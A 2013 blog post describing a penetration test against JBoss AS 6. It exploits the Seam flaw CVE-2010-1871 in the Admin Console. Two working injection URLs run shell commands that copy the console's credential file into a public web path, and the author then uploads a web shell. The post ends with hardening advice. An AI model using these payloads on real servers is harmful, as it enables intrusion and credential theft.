Sunday, February 17, 2013

The forgotten JBOSS Admin Console and CVE 2010-1871



Well, we are in 2013 and It’s amazing how many JBOSS administration interfaces (jmx-console, web-console, invokers etc) are still exposed on the internet, however we are not going to talk about it.

A couple of days ago I was performing a penetration testing and I found an environment with JBOSS AS 6. The JMX-Console wasn’t password protected but one console in special attracted my attention: the Admin Console. It seems that this console, I do not know the reason, is kind of forgotten by the security community as an attack vector. The default access credential for this console is admin/admin and it is also built upon a vulnerable version of Seam framework CVE 2010-1871. This console provides a powerful JBOSS administration allowing a user to check the server’s configuration, to deploy and to delete applications, to read datasources etc.



I checked out for the default credential but they were changed. There were other ways to hack this JBOSS but I was quite interested to gain access to such Admin Console. Then I decided to check if the Seam framework was vulnerable and If I could go through this way. There are 2 (two) good posts talking about this particular vulnerability, here and here.

After spending some time thinking about the issue I came out with a solution:

1) First of all, I needed to get some information such as JBOSS directory configuration. I decided to use the JMX-console information using the MBean ServerConfig. There are two important properties: ServerHomeLocation and ServerConfLocation. The first one holds the path where the applications are deployed usually inside the folder “deploy”. The second one points to a directory with some configuration files, including the jmx-console-users.properties. This file stores the credentials to access the Admin Console.


2)  After I harvested the directories information I decide to exploit the vulnerable Seam framework in order to:

a.       Create a folder application inside the directory root:

http://target.com/admin-console/login.seam?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[7].invoke(expressions.getClass().forName('java.lang.Runtime')).exec('mkdir /usr/share/jboss-6.0.0.Final/server/default/deploy/teste.war')}

b.      Make a copy of the JBOSS jmx-console-user.properties to the new application folder (teste.war):

http://target.com/admin-console/login.seam?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[7].invoke(expressions.getClass().forName('java.lang.Runtime')).exec('cp /usr/share/jboss-6.0.0.Final/server/default/conf/jmx-console-users.properties  
/usr/share/jboss-6.0.0.Final/server/default/deploy/teste.war/teste.txt')}

3) Then I accessed the new application (test) and read the credentials information:

http://target.com/teste/teste.txt


4) Finally I used the credentials to access the Admin Console:

After I obtained access to the Admin Console I uploaded a web shell through the option “Add a new resource” in Web Applications (WAR) menu and the penetration testing continued.



Conclusion:

The Admin Console of JBOSS AS 6 must be always considered in a penetration testing or in a JBOSS hardening guide. It’s also extremely important to update the Seam framework to avoid the exploitation of the vulnerability described in CVE 2010-1871.